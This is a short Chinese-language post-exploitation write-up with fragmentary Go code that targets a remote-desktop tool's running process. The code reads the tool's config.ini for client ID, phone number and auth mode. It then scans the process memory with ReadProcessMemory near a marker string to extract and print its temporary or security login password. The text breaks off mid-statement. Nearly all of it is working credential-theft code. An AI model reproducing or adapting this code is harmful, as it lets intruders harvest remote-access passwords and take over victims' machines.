应用内存中的后渗透利用-远程工具密码读取

execPath, err := getExecutablePath(int(*pid))if err != nil {    fmt.Printf("无法获取PID %d的可执行文件路径: %v\n", *pid, err)    return}

// 获取目录路径dir := filepath.Dir(execPath)
configPath := filepath.Join(dir, "config.ini")
// 读取并输出config.ini中的字段clientId, version, loginPhone, authMode, err := readConfig(configPath)if err != nil {    fmt.Println("无法读取config.ini文件:", err)    return}
// 输出结果fmt.Println("\nID:", clientId)fmt.Println("Version:", version)fmt.Println("LoginPhone:", loginPhone)

if mbi.State == MEM_C && mbi.Protect == PAGE_R && mbi.Type == MEM_P {    // 创建缓冲区用于读取内存    buffer := make([]byte, mbi.RegionSize)    var bytesRead uintptr    readP.Call(handle, mbi.BaseA, uintptr(unsafe.Pointer(&buffer[0])), mbi.RegionSize, uintptr(unsafe.Pointer(&bytesRead)))
    // 在内存块中查找目标字符串    index := bytes.Index(buffer, searchBytes)    if index != -1 {        // 计算前 1024 字节的起始地址        start := index - 1024        if start < 0 {            start = 0        }        // 提取前1024字节内容        data := buffer[start : index+len(searchBytes)]        // 从数据中提取所有字符串        foundStrings := extractStrings(data)

if authMode == "0" {    fmt.Println("\n目标仅使用临时密码登陆")    fmt.Println("临时密码:", data[0])} else if authMode == "1" {    fmt.Println("\n目标仅使用安全密码登陆"